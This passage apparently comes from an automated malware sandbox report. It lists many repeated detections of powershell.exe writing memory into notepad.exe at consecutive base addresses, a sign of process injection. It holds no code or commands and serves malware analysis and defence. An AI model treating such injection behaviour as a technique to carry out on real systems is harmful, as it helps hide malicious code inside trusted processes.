              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430032Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430033Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430034Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430035Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430036Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430037Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430038Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430039Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743003AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743003BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743003CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743003DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743003EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743003FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430040Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430041Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430042Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430043Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430044Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430045Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430046Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430047Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430048Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430049Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743004FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430050Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430051Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430052Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430053Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430054Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430055Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430056Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430057Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430058Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430059Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743005FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430060Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430061Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430062Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430063Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430064Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430065Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430066Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430067Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430068Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430069Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743006FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430070Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430071Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430072Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430073Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430074Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430075Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430076Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430077Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430078Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430079Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743007FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430080Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430081Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430082Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430083Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430084Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430085Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430086Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430087Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430088Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430089Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743008FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430090Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430091Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430092Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430093Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430094Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430095Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430096Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430097Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430098Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430099Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 2885743009FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300F9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300FAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300FBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300FCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300FDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300FEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574300FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430100Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430101Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430102Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 28857430103Jump to behavior
